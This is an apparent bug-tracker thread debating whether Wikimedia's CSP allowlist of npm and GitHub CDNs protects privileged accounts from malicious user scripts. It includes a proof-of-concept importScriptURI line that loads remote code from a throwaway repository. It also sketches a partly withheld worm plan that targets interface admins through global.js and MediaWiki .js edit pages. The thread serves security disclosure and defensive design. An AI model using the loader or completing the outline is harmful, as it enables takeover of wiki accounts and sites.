To be clear, including npm CDNs in our CSP was a (significant) concession to avoid breakage, and not something we expect to support long-term. It will need to come off of the CSP allowlist eventually. Even so, npmjs and raw.githubusercontent.com are both owned by Microsoft and have their own internal security teams that have by now gained extensive experience with public security incidents caused by malicious code, and they are investing in making such incidents harder to cause and shorter-lived. That is dramatically different from the open-season internet, with domains an attacker can fully control until their DNS is disabled (if that is even feasible). Even this interim situation, which includes user-manageable CDN endpoints, is much safer than it was before the CSP went up.

Which still allows anyone to push any code to npm and use an npm CDN that is allowed in the CSP. So the CSP is mostly useless: it blocks legitimate requests and breaks tools, yet doesn't block the real attacks that can still happen.

To be clear, including npm CDNs in our CSP was a (significant) concession to avoid breakage, and not something we expect to support long-term. It will need to come off of the CSP allowlist eventually. Even so, npmjs and raw.githubusercontent.com are both owned by Microsoft and have their own internal security teams that have by now gained extensive experience with public security incidents caused by malicious code, and they are investing in making such incidents harder to cause and shorter-lived. That is dramatically different from the open-season internet, with domains an attacker can fully control until their DNS is disabled (if that is even feasible). Even this interim situation, which includes user-manageable CDN endpoints, is much safer than it was before the CSP went up.

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).

  1. I was not vetted when I created my GitHub account (which was not even owned by Microsoft then).
  2. Accounts created on GitHub do not have to use 2FA at all. So it is not that complicated to guess one of thousands of insecure passwords on GitHub.
  3. Accounts created on npm have to use 2FA, but there is no vetting either. So any attacker can create an npm package.
  4. I can run npm publish without publishing to GitHub. The zip is created locally.
  5. There is no approval process before my npm package is publicly available. When I published my first npm package I thought there would be some process, but there is none.

So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

Here's an example on Fandom: https://community.fandom.com/wiki/MediaWiki:ImportJS. Each listed script is hosted in the MediaWiki: namespace or on Dev Wiki.

Fandom's implementation only seems to allow loading scripts either from the dev.fandom.com wiki or from the local wiki. If we were to go this route, we could perhaps allow interwiki loading only from other Wikimedia wikis.

There are legitimate reasons to load external scripts in a user script and in a site script. I wonder whether there could also be a global Meta-Wiki page that allow-lists certain scripts and style sheets (for example Google Fonts, MDN, etc.) for the MediaWiki: namespace.

No one can then compromise an entire wiki by pasting their malicious script onto common.js.

No: a malicious script can be self-contained (e.g. in JS, converting a function to a string yields its source code). Also, even if we disable loading of external scripts, a malicious script can simply fetch an external (or even Wikimedia-hosted) webpage and eval it.

I think I was talking about this being paired with the code review process I described above. Interface administrators are expected to have some level of understanding of what they are putting on a wiki, but we can never be too safe.

This took 14 minutes 21 seconds to prepare:

// Two hosting options for the PoC; only the uncommented assignment takes effect:
// var url = "https://raw.githubusercontent.com/johnnybebad26/wiki-poc-fun/refs/heads/main/poc.js";
var url = "https://cdn.jsdelivr.net/gh/johnnybebad26/wiki-poc-fun@main/poc.js";
importScriptURI(url);

Yes, I did measure the time with a stopwatch ;). I included both creating an e-mail account (on proton) and creating a new Github account.

And also note this is all generated by AI. I don't have to be coder to do this.

So yeah. Even though I wouldn't use the words stjn used, I still agree with what he said. The current solution is more security theater than anything else, and along the way it adds friction for the community.

PS: In case you were wondering: yes, johnnybebad was taken :))

Furthermore, automated edits take—what—well under a second, right?

15 minutes is 900 seconds, so let’s say roughly 1,000 edits. Some patroller would probably notice that rate, but the damage would already be done.

My point is that once you’re compromised, and once the “re‑auth window” is open, the disaster will unfold regardless. It’s like trying to stop a bullet with paper plates. Shortening the re‑auth window would be like adding more plates, while making the experience even more annoying for users. This leads me to think the entire “window of unprotection” approach is fundamentally flawed.

Every edit should be protected. But protection can’t introduce unacceptable friction in the form of tedious manual steps at every edit. So we need a different paradigm—one that aligns with the alternative methods proposed by myself and others above.

I don't usually publish recipes for attacks, but I feel like we will not get anything done without this. I did warn that creating the CSP in a rush is just wrong. I did say that the incident scenario is not realistic, as normally scripts go through a community process that, while not perfect, is far better than what GitHub or npm has in place.

Why the current system is not the best:

  1. Find a list of active users. This seems convenient, as you can even filter by group: https://apersonbot.toolforge.org/recently-active/ (but of course you can also use Quarry and ChatGPT / Claude / Gemini to get a better list via SQL)
  2. Add that group to an array in JS. Add that script on GitHub.
  3. Create a script that seems useful and lives on GitHub.
  4. [some undisclosed steps that make the attack more feasible]
  5. Load the array of interface admins on Meta and an array of just active users on your target wiki.
  6. Use importScriptURI to load another script from jsdelivr that adds code to global.js on Meta for the current user.
  7. [some undisclosed steps that make the attack more feasible]
  8. Add another script that:
    1. Waits for the page to load. Can be as simple as window.onload.
    2. Checks if the user is on action=edit, the namespace is MediaWiki, and the page title ends with ".js". You can do that in many ways; I'm sure ChatGPT knows at least one of them.
    3. And now... [some undisclosed stuff that I hope is obvious to security staff]
  9. [undisclosed final step]
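For illustration (and because it is exactly the condition a defensive redirect to a locked-down edit page would also need), the non-secret check from step 8.2 can be written as a pure function. In the browser the three inputs would come from mw.config.get('wgAction'), mw.config.get('wgNamespaceNumber') and mw.config.get('wgPageName'):

```javascript
const NS_MEDIAWIKI = 8; // the MediaWiki: namespace number

// True when the current page is an edit view of a sitewide JS page.
function isSitewideJsEditPage(action, namespaceNumber, pageName) {
  return action === 'edit'
    && namespaceNumber === NS_MEDIAWIKI
    && pageName.endsWith('.js');
}

console.log(isSitewideJsEditPage('edit', 8, 'MediaWiki:Common.js')); // true
console.log(isSitewideJsEditPage('view', 8, 'MediaWiki:Common.js')); // false
```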

Write to me if you want the full steps. The above can be prevented with the Special:SecureEdit page I wrote about above and with a properly developed CSP, which I mentioned earlier this year. Re-auth is not needed at all.

There are three ways to modify a .js page under advanced restrictions:

  1. Interactively, via some Special:SecureEdit or Special:EditResource etc., which runs in safe mode.
  2. An HTTP POST to index.php of a form with all the field values from Special:SecureEdit, including the hidden safety keys that are built in when the page is retrieved from the wiki server.
  3. Changing a set of pages via api.php, providing a special security code valid for one run only, for this account only, within some days.

The second possibility makes the safe-mode Special:SecureEdit obsolete, since the wiki server cannot distinguish between a page genuinely used interactively in a browser and an HTTP POST which sends the fields as if the submit button had been pressed manually.

For interactive work I see only two approaches worth investing manpower and development in:

  • Confirm every single edit by some Auth, password, 2FA, captcha etc. Has been called “annoying” above.
  • Use a second account which is safemode for all edits anywhere.
    • If there is a permission to edit resource pages always, or for the next 14 or 5 or 59 minutes, I can submit via the API or an HTTP POST within this interval; and I can detect that a first resource edit has been made, start my stopwatch, and avoid unauthorized attempts which might be monitored.
    • If this account is permitted to edit resource pages sometimes, then never ever shall any JS from site or user pages be loaded via preferences.
    • If you need some tools for code checking, or for equipping the page with links to helpful stuff, you might provide them via Greasemonkey or browser scripts. They cannot be attacked if you are careful and write them yourself.
    • If this account is not a safe-mode account, any kind of editinterface right should be revoked on the fly.
    • You may use a second browser on the same device, or a special device for editinterface business. There you can stay logged in. By copy-and-paste you can exchange text fragments, and regular editing with global WMF tools is available on all pages.

To address the concern that a script on the main domain can still forge POST requests or sniff tokens (as mentioned in point 2 above), one potential path worth mentioning is moving sensitive edits to a dedicated, "naked" domain (e.g., secure-edit.wikimedia.org).

By using a separate origin, this would leverage the browser's Same-Origin Policy (SOP). Scripts running on the main wiki would be effectively blocked from reading the DOM or intercepting CSRF tokens on the secure domain. The server could then accept modifications to .js/.css pages only when they carry the Origin header of this secure domain.

I am only mentioning this as a theoretical direction. Implementing and maintaining such a cross-domain architecture would likely represent a massive amount of work and engineering overhead; however, it is one of the few ways to turn "Safe Mode" into a browser-enforced security boundary.
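A sketch of the server-side gate described above (the domain name and helper function are illustrative assumptions, not an existing deployment):

```javascript
// Accept a sensitive write only when the request's Origin header names the
// dedicated editing domain. Browsers set Origin themselves and scripts cannot
// override it (it is a forbidden header), so a request forged from the main
// wiki origin carries the wrong value.
const SECURE_EDIT_ORIGIN = 'https://secure-edit.wikimedia.org';

function isAllowedSensitiveWrite(originHeader) {
  return originHeader === SECURE_EDIT_ORIGIN;
}

console.log(isAllowedSensitiveWrite('https://secure-edit.wikimedia.org')); // true
console.log(isAllowedSensitiveWrite('https://en.wikipedia.org'));          // false
```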

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).

  1. I was not vetted when I created my GitHub account (which was not even owned by Microsoft then).
  2. Accounts created on GitHub do not have to use 2FA at all. So it is not that complicated to guess one of thousands of insecure passwords on GitHub.
  3. Accounts created on npm have to use 2FA, but there is no vetting either. So any attacker can create an npm package.
  4. I can run npm publish without publishing to GitHub. The zip is created locally.
  5. There is no approval process before my npm package is publicly available. When I published my first npm package I thought there would be some process, but there is none.

So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Oh yes, there is *lots* of risk involved in allowlisting npm as a serving location for code that can run in privileged users' sessions on Wikimedia projects. It is really easy to demonstrate that, and it will not stay in our CSP over the long term.

But even that *lots* of risk is still *much* less than the risks involved in allowing unpredictable internet domains, including domains fully owned and controlled by attackers (unlike npm, which is fully owned and operated by a known company). I recognize it may not feel like a big deal to you since the new status quo still allows attacker-controllable content to be hosted there, but it is still a massive improvement.

Securing user-managed code will happen in stages, and having third-party domains come from a known allowlisted universe is an important stage 1, even if that universe includes some dangerous domains. (And even if we ended up moving there in a clumsy way instead of the planned way we'd hoped for.)

Securing user-managed code will happen in stages, and having third-party domains come from a known allowlisted universe is an important stage 1, even if that universe includes some dangerous domains. (And even if we ended up moving there in a clumsy way instead of the planned way we'd hoped for.)

If a privileged account is permitted to run any JS which does not originate from the trusted MediaWiki central repository, it is always possible to misuse this, especially for worm proliferation.

  • If it originates from somewhere on the web, we have no history at all.
  • It may be loaded from site JS, a site gadget, or the user JS of any account. After the nuke has happened, we can inspect the page history. Fine.

The simple conclusion is: While site or user JS can be loaded, editinterface is to be blocked.

  • If you want to use editinterface etc. membership, the entire account must be in safe-mode state. Always.
  • If your account does enable site or user JS loading, then the group membership must be suspended.
  • If you can perform interface edits sometimes, and any JS from any source is listening, it can wait for a good occasion and start automatic procedures on behalf of your account.

Therefore the CSP does not prevent attacks, but causes breakage. The originating URL does not matter.

VisualEditor is retrieved from the MediaWiki central repository and should be clean.

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).
[...]
So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Oh yes, there is *lots* of risk involved in allowlisting npm as a serving location for code that can run in privileged users' sessions on Wikimedia projects. It is really easy to demonstrate that, and it will not stay in our CSP over the long term.

But even that *lots* of risk is still *much* less than the risks involved in allowing unpredictable internet domains, including domains fully owned and controlled by attackers (unlike npm, which is fully owned and operated by a known company). I recognize it may not feel like a big deal to you since the new status quo still allows attacker-controllable content to be hosted there, but it is still a massive improvement.

I'm sorry, but I tried not to say things straight, and that is clearly not working. That is not how security works. I don't know if you are a security expert; I assume you are not. Nothing personal, it just doesn't make sense to me what you say. In security, if you have an easy way of bypassing a security wall, then the wall is useless. And that CSP wall is VERY EASY to bypass; I already showed that. I mean, please ask someone on your team. You think you have a secure wall, you show off the wall, but it's just a facade. Even less than a facade: you've only built it on one side and people just walk around it. And on the internet, going around your wall doesn't take as much effort as in the physical world. In fact, now with AI, any kid can bypass that CSP facade. They just need to ask for it.

When you (as in WMF) got flooded with people asking for the next CSP exception, I really hoped you, anyone, would say, "hey, this is not working, let's just revert and work on this later." It boggles my mind, really, why that didn't happen.

There are three ways to modify a .js page under advanced restrictions:

  1. Interactively, via some Special:SecureEdit or Special:EditResource etc., which runs in safe mode.
  2. An HTTP POST to index.php of a form with all the field values from Special:SecureEdit, including the hidden safety keys that are built in when the page is retrieved from the wiki server.
  3. Changing a set of pages via api.php, providing a special security code valid for one run only, for this account only, within some days.

The second possibility makes the safe-mode Special:SecureEdit obsolete, since the wiki server cannot distinguish between a page genuinely used interactively in a browser and an HTTP POST which sends the fields as if the submit button had been pressed manually.

To be clear, my point was that Special:SecureEdit would be a separate form just for special (fragile) edits. It would accept any title though (for better separation of concerns).

I think I haven't mentioned this, but you would not be able to POST to it from another page: you would not have a token. CSRF tokens are specifically designed to block forged requests. The important part here is that the token must be specific to that page and, obviously(?), specific to a single user and only available on that special page.

The GUI could look something like this:

obraz.png (1×1 px, 138 KB)

I've intentionally removed most of the elements. I've kept the history tab because I often open it when I edit JS/CSS, to make sure nobody has made any changes in the meantime (and for other checks). But I think it would be fine even if no tabs were there.

I really think this can be done by the end of the month. Perhaps even next week, if people are free to work on it. The first version could be just that special page. Then (or in parallel), work on a redirect to that special page instead of the current re-auth redirects.

PS: The special page URL address would be:
https://en.wikipedia.org/wiki/Special:SecureEdit?title=MediaWiki:Common.js
I made a typo in the script visible in the screenshot :)

Please be careful of the Nirvana fallacy in the comment section of this ticket. Just because a solution (such as the CSP allowlist containing GitHub and npm) isn't perfect doesn't mean it's not helpful. Anything that makes hacking us harder or more time-consuming, or that requires attackers to have more knowledge, is helpful and will reduce attacks overall.

Incremental progress is also a good thing, because security is a slider with security on one side and user convenience on the other, and moving the slider too fast away from user convenience would generate backlash.

@Novem_Linguae I'm not speaking as a random dude on the internet; I have experience and training in security. You can of course choose not to believe me, but it is not hard to check.

Adding a firewall that has no known bugs but can have a hidden backdoor – that is adding a layer of security. It can maybe be hacked, but it's a layer.

Adding a small time window in which some important resource can be edited, while still requiring something extra... that is adding a thin layer of security, I'll give you that. As shown, it is still exploitable, and not in a hard way, but it does close some categories of attacks.

Adding a CSP that doesn't have to be hacked – where you just do legal stuff anyone can do, without any vetting and with little knowledge – that part is theatrics. By theatrics I mean: taking away my perfectly harmless 500 ml of water while allowing a terrorist to bring two 250 ml bottles, which they can mix later in the bathroom to get a 500 ml bomb. It is taking away my knitting kit while handing terrorists metal forks at dinner on the plane. It is adding friction for the wiki community by blocking legitimate requests that download JSON, while doing absolutely nothing to stop attacks with JS executed straight from unsafe domains.

Instead of adding more and more stuff to the CSP, you should have focused on blocking whole categories of attacks. For example, discuss removing wss with the community and block it completely. Discuss removing eval and block it completely. That would add layers, because it would block whole categories of attacks. The current CSP is not that, so it is mostly useless.

Instead of adding more and more stuff to the CSP, you should have focused on blocking whole categories of attacks. For example, discuss removing wss with the community and block it completely. Discuss removing eval and block it completely. That would add layers, because it would block whole categories of attacks. The current CSP is not that, so it is mostly useless.

My understanding is that $.append(...), $.prepend(...) and $.html(...) make use of eval-like primitives, depending on how they are used. I'm unsure how many Wikimedia scripts rely on this, but removing eval might not be as trivial as just dropping it from the CSP.
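For clarity on what "eval-like primitive" means here: the Function constructor also compiles a string into executable code, and a CSP lacking 'unsafe-eval' makes exactly this kind of call throw an EvalError in the browser (whether jQuery hits such a path depends on the version and how the methods are used):

```javascript
// The Function constructor is an eval-like primitive: it turns a string into
// code at runtime. Under a CSP without 'unsafe-eval' this line would throw.
const compiled = new Function('a', 'b', 'return a + b;');

console.log(compiled(1, 1)); // 2
```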